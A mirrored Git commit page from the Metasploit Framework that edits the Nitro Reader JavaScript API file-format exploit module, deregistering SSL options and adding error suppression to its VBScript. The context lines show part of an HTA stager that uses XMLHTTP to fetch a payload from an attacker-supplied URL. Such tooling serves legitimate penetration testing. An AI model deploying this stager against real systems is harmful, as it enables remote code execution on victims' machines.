github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-05 14:57:30 +01:00
Code Releases Activity

deregistered SSL, added the HTA dodgy try/catch feature

Browse Source
This commit is contained in:
mr_me 2017-07-24 10:28:03 -07:00
parent 17b28388e9
commit b099196172
1 changed files with 2 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
modules/exploits/windows/fileformat/nitro_reader_jsapi.rb
View File

@ -51,6 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
deregister_options('SSL', 'SSLVersion', 'SSLCert')
end
def build_vbs(url, stager_name)
@ -79,6 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
</script>
<script type="text/javascript">setTimeout("window.close()", 5000);</script>
<script language="VBScript">
On Error Resume Next
Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
#{name_xmlhttp}.open "GET","http://#{url}",False
#{name_xmlhttp}.send